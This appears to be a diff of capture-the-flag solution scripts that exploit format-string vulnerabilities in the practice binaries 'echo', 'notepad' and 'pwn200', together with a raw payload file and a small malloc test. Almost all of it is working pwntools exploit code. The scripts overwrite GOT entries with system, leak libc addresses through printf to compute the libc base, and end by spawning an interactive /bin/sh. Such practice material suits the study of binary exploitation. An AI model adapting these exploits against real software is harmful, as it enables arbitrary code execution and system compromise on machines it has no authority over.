Renamed

FormatString/echo/answer_echo.py

@@ -0,0 +1,19 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math
+context(arch = "i386",os = "linux", log_level = "debug")
+
+p = process('./echo')
+elf = ELF('./echo')
+
+printf_got = elf.got['printf']
+system_plt = elf.plt['system']
+
+payload = fmtstr_payload(7, {printf_got: system_plt})
+
+p.sendline(payload)
+p.sendline("/bin/sh")
+p.interactive()
+

FormatString/echo/test_echo.py

@@ -0,0 +1,35 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math
+context(arch = "i386",os = "linux", log_level = "debug")
+
+def gen_write_byte_format_string_i386(byte_value, write_address, fmtstr_shift_position, padding='0'):
+    # Placing: Align4(Padding Characters(Output_Count = byte_value), Fmtstr), Write Address
+    first_padding = padding * byte_value
+    flag = True
+    align_part_align_length = int(math.ceil(float(byte_value) / 4) + 2)
+    fmt_str = "%%%d$hhn" % (fmtstr_shift_position + align_part_align_length)
+    result_1 = first_padding + fmt_str
+    result_1 += (align_part_align_length * 4 - len(result_1)) * padding
+    result = result_1 + p32(write_address)
+    return result
+
+with open("answer_echo.txt", "w") as f:
+    f.write(gen_write_byte_format_string_i386(1, 0xffffce0c, 7))
+    f.write("\n")
+    f.write(gen_write_byte_format_string_i386(2, 0xffffce0d, 7))
+    f.write("\n")
+    f.write(gen_write_byte_format_string_i386(3, 0xffffce0e, 7))
+    f.write("\n")
+    f.write(gen_write_byte_format_string_i386(4, 0xffffce0f, 7))
+    f.write("\n")
+    f.write("exit")
+    f.write("\n")
+
+
+#p = process('./echo')
+#elf = ELF('./echo')
+
+

FormatString/echo/test_echo.txt

@@ -0,0 +1,5 @@
+0%10$hhn0000<0C><><EFBFBD>
+00%10$hhn000
+<EFBFBD><EFBFBD><EFBFBD>
+000%10$hhn00<0E><><EFBFBD>
+0000%10$hhn0<0F><><EFBFBD>

FormatString/notepad/answer.py

@@ -0,0 +1,111 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math, time
+context(arch = "i386",os = "linux", log_level = "debug")
+
+def notepad_init(p):
+    p.recvuntil("::> ")
+    p.sendline("c")
+
+def notepad_new(p):
+    p.recvuntil("::> ")
+    p.sendline("a")
+    p.recvuntil("size > ")
+    p.sendline("16")
+    p.recvuntil("data > ")
+    p.sendline("\x00")
+
+def notepad_open(p, id, content, option):
+    p.recvuntil("::> ")
+    p.sendline("b")
+    p.recvuntil("id > ")
+    p.sendline("%d" % id)
+    p.recvuntil("edit (Y/n)")
+    p.sendline("Y")
+    p.recvuntil("content > ")
+    p.sendline(content)
+    p.recvuntil("::> ")
+    p.sendline(option)
+
+def notepad_open_noinput(p, id, option):
+    p.recvuntil("::> ")
+    p.sendline("b")
+    p.recvuntil("id > ")
+    p.sendline("%d" % id)
+    p.recvuntil("::> ")
+    p.sendline(option)
+
+
+p = process('./notepad')
+elf = ELF('./notepad')
+gdb_command =   """
+                b *0x8048ae7
+                b *0x8048ce8
+                """
+# 0x8048ae7: malloc on notepad_new
+# 0x8048ce8: call eax on notepad_open
+strncpy_plt = elf.plt['strncpy']
+"""
+    The PLT address of printf end with 0x00, obstructed the copy from 
+stack variable array s in notepad_open() to v1->text in heap on strncpy()
+function. According to PLT/GOT mechanism, call to PLT entry address + 6 
+will lead to dynamic linker refilling the GOT table entry and reinvoke
+function again. So add the origin PLT address to a offset 0x6 will have
+the same effect on calling the pure PLT entry.
+"""
+printf_plt = elf.plt['printf'] + 0x6
+puts_plt = elf.plt['puts']
+puts_got = elf.got['puts']
+time.sleep(1)
+# gdb.attach(p, gdb_command)
+
+
+notepad_init(p)
+"""
+    Via experimenting, every 0x20 Bytes memory block allocation request 
+sent to malloc() would lead to a 0x30 Bytes offset between two memory 
+block pointers.
+"""
+for i in range(4):
+    notepad_new(p) # Apply memory for 4 notepadStruct
+
+# Write strncpy() address to notepadStruct0.text(&notepadStruct0+16B)
+notepad_open(p, 0, p32(strncpy_plt), "a")
+"""
+    First, send the printf format string to stack variable array s. The 
+11th argument will be the GOT adress of puts. We need to leak that.
+    Secondly, there exists a vulnerability in menu() so we can call arbitary
+function, and the offset between &notepadStruct1 and &notepadStruct0.text
+is 0x20, so we minus 8 here in the option.
+    In all, we executed strncpy(&notepadStruct1, "%11$s", 16).
+"""
+notepad_open(p, 1, "%11$s    " + "\x00", chr(ord("a") - 8))
+# Write printf() address to notepadStruct0.text(&notepadStruct0+16B)
+notepad_open(p, 0, p32(printf_plt), "a")
+"""
+    Here we wrote GOT address of puts() to the stack also the 11th argument
+position and called the printf().
+    In all, we executed printf("%11$s", ... (9 arguments), got_of_puts) to
+leak the libc address of puts to find libc base offset.
+"""
+notepad_open(p, 1, p32(puts_got) + "    \x00", chr(ord("a") - 8))
+
+puts_libc = u32(p.recv(4))
+print("puts libc: %s" % hex(puts_libc))
+libc = LibcSearcher('puts', puts_libc)
+libc_base = puts_libc - libc.dump('puts')
+print("base libc: %s" % hex(libc_base))
+system_libc = libc_base + libc.dump('system')
+print("system libc: %s" % hex(system_libc))
+
+# Similarly, copy "/bin/sh" as the first argument
+notepad_open(p, 2, p32(strncpy_plt), "a")
+notepad_open(p, 3, "/bin/sh" + "\x00", chr(ord("a") - 8))
+# Prepare system()
+notepad_open(p, 2, p32(system_libc), "a")
+# Call system("/bin/sh")
+notepad_open_noinput(p, 3, chr(ord("a") - 8))
+
+p.interactive()

FormatString/notepad/testMalloc.c

@@ -0,0 +1,9 @@
+#include <stdio.h>
+#include <stdlib.h>
+int main(){
+	for(int i=0; i<10; i++){
+		void *p = malloc(0x20);
+		printf("%p\n", p);
+	}
+	return 0;
+}

FormatString/pwn200/answer.py

@@ -0,0 +1,79 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math
+context(arch = "i386",os = "linux", log_level = "debug")
+
+p = process('./pwne')
+elf = ELF('./pwne')
+
+p.recvuntil("WANT PLAY[Y/N]\n")
+p.sendline("Y")
+p.recvuntil("GET YOUR NAME:\n\n")
+p.sendline("%p\n\x00")
+p.recvuntil("WELCOME \n")
+buf_shift = int(p.recvuntil("\n"), 16)
+ret_addr = buf_shift + 0x50
+p.sendline("10")
+
+puts_got = elf.got['puts']
+puts_plt = elf.plt['puts']
+printf_got = elf.got['printf']
+main_sym = 0x80485CD
+
+p.recvuntil("WANT PLAY[Y/N]\n")
+p.sendline("Y")
+p.recvuntil("GET YOUR NAME:\n\n")
+payload = fmtstr_payload(7, 
+    {
+        ret_addr: puts_plt
+    }
+)
+p.sendline(payload)
+p.recvuntil("WELCOME \n")
+p.sendline("10")
+
+p.recvuntil("WANT PLAY[Y/N]\n")
+p.sendline("Y")
+p.recvuntil("GET YOUR NAME:\n\n")
+payload = fmtstr_payload(7, 
+    {
+        ret_addr + 4: main_sym
+    }
+)
+p.sendline(payload)
+p.recvuntil("WELCOME \n")
+p.sendline("10")
+
+p.recvuntil("WANT PLAY[Y/N]\n")
+p.sendline("Y")
+p.recvuntil("GET YOUR NAME:\n\n")
+payload = fmtstr_payload(7, 
+    {
+        ret_addr + 8: puts_got
+    }
+)
+p.sendline(payload)
+p.recvuntil("WELCOME \n")
+p.sendline("10")
+
+p.recvuntil("WANT PLAY[Y/N]\n")
+p.sendline("NY")
+puts_libc = u32(p.recv(4))
+print(hex(puts_libc))
+
+libc = LibcSearcher('puts', puts_libc)
+libc_base = puts_libc - libc.dump('puts')
+print("base libc: %s" % hex(libc_base))
+system_libc = libc_base + libc.dump('system')
+print("system libc: %s" % hex(system_libc))
+
+p.recvuntil("GET YOUR NAME:\n\n")
+payload = fmtstr_payload(7, {printf_got: system_libc})
+p.sendline(payload)
+p.sendline("10")
+p.recvuntil("WANT PLAY[Y/N]\n")
+p.sendline("Y")
+p.sendline("/bin/sh")
+p.interactive()